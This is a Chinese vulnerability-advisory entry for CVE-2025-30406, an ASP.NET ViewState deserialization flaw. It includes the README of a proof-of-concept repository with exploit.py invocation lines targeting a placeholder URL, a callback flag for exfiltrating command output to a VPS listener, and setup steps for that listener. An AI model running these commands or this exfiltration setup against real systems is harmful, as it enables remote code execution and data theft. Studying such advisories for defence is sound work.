ASPNET ViewState 反序列化漏洞
漏洞信息
漏洞名称: ASP.NET ViewState 反序列化漏洞
漏洞编号:
- CVE: CVE-2025-30406
漏洞类型: 反序列化
漏洞等级: 高危
漏洞描述: ### 受影响产品
ASP.NET 是微软开发的一个用于构建Web应用程序的框架,广泛应用于企业级服务和各种Web应用程序中。它支持多种编程语言,如C#和VB.NET,并且因其强大的功能和灵活性而被广泛使用。
漏洞解释
CVE-2025-30406 是一个存在于ASP.NET ViewState处理中的反序列化漏洞。攻击者可以通过构造恶意的ViewState数据,利用已知的验证密钥和生成器,实现远程代码执行。这种漏洞的根本原因在于ASP.NET在处理ViewState数据时,未能正确验证和限制反序列化操作,导致攻击者可以注入并执行任意代码。
影响分析
此漏洞的影响极为严重,因为它允许攻击者在目标系统上执行任意代码,可能导致数据泄露、服务中断甚至完全控制系统。攻击者需要知道有效的ViewState验证密钥和生成器才能利用此漏洞,但一旦这些信息被获取,攻击可以自动化执行,无需用户交互。因此,所有使用ASP.NET且配置不当的系统都可能面临高风险。建议管理员立即检查并更新系统配置,以防止潜在的攻击。
产品厂商: Microsoft
产品名称: ASP.NET
来源: https://github.com/mchklt/CVE-2025-30406
类型: CVE-2025:github search
仓库文件
- README.md
- exploit.py
- server.py
- ysoserial.exe
来源概述
CVE-2025-30406 ViewState Exploit PoC
Overview
This is a Proof-of-Concept (PoC) script demonstrating a ViewState deserialization exploit for CVE-2025-30406 in ASP.NET applications. It uses ysoserial to generate a malicious ViewState payload and sends it to a user-specified URL to execute a provided command. For best results, command output can be exfiltrated to a custom HTTP server (server.py) running on a VPS, which displays results in a styled format with timestamps, green prompts, and white output text. This script is intended for educational purposes only and must only be used on systems where you have explicit permission to perform security testing. Unauthorized use is illegal and unethical.
CVE Details
- CVE ID: CVE-2025-30406
- Description: A deserialization vulnerability in ASP.NET ViewState handling that allows remote code execution when a valid validation key and generator are known.
- Affected Systems: ASP.NET applications with vulnerable ViewState configurations.
- Prerequisites for Exploitation:
- Access to a valid ViewState validation key and generator.
- A vulnerable endpoint accepting ViewState parameters.
Repository Contents
exploit.py: The main PoC script to generate and send the ViewState payload.server.py: An HTTP server to receive and display exfiltrated command output in a styled format.README.md: This file, with setup and usage instructions.
Prerequisites
- Python 3.x
requestslibrary (pip install requests)- ysoserial executable (Windows or equivalent for your platform)
- A vulnerable ASP.NET application endpoint
- A VPS or server to run
server.py(recommended for exfiltration) - Permission to test the target system
Installation
- Clone this repository:
1
2git clone https://github.com/yourusername/cve-2025-30406-poc.git
cd cve-2025-30406-poc - Install the required Python package:
1
pip install requests - Download ysoserial and place it in the same directory as
exploit.pyor specify its path:
Setup on a VPS (Recommended)
To receive exfiltrated command output in a styled format, run server.py on a VPS:
- Copy
server.pyto your VPS (e.g., viascp):1
scp server.py user@your-vps-ip:/home/user/ - Ensure Python 3 is installed:
1
sudo apt update && sudo apt install python3 python3-pip - Run the server (default port 8000):
1
python3 server.py - Ensure the VPS firewall allows inbound traffic on port 8000:
1
sudo ufw allow 8000 - Note the VPS’s public IP or domain (e.g.,
http://your-vps-ip:8000) for use with the-eflag inexploit.py.
Usage
Running the Exploit
Run exploit.py with the required arguments. The -e flag is optional but highly recommended for exfiltrating command output to server.py for styled display.
1 | |
Arguments
-u, --url: Target URL (e.g.,http://target.com/page.aspx) [Required]-c, --command: Command to execute (e.g.,whoami) [Required]-y, --ysoserial: Path to ysoserial executable (default:./ysoserial.exe) [Optional]-e, --exfil: Callback URL for exfiltrating command output (e.g.,http://your-vps:8000) [Optional]
Examples
- Run without exfiltration (Blind execution):
1
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe - Run with exfiltration to a VPS running
server.py(recommended):1
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
Running the Server
On your VPS or local machine, start the HTTP server to receive exfiltrated output:
1 | |
The server will display command output with timestamps, a green $ prompt, and white text for readability.
How It Works
- Exploit Script (
exploit.py):- Uses ysoserial with a hardcoded validation key and generator to create a ViewState payload.
- If
-eis provided, the command is wrapped to capture output and send it to the callback URL viaInvoke-WebRequest. - Sends the payload to the target URL in a POST request, embedded in the
__VIEWSTATEparameter. - Prints the server’s response status and a portion of the response body.
- HTTP Server (
server.py):- Listens for GET requests containing command output.
- Decodes the URL path and splits it into lines.
- Prints each line with a timestamp, green
$prompt, and white output text. - Responds with HTTP 200 and “OK”.
Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-30406 for educational and authorized security testing purposes.
- Do not use this script on systems without explicit permission from the system owner.
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
- Report vulnerabilities responsibly through coordinated disclosure or bug bounty programs.
Limitations
- The hardcoded validation key and generator may only work for specific vulnerable applications. Users may need application-specific values.
- The exploit targets ASP.NET applications vulnerable to ViewState deserialization.
- The script assumes the target server processes the ViewState payload correctly.
- Cross-platform compatibility depends on ysoserial availability (primarily Windows-based).
- Exfiltration requires a publicly accessible server for the
-ecallback URL.
License
This project is licensed under the MIT License. See the LICENSE file for details.
Contact
For questions or feedback, please open an issue on this repository.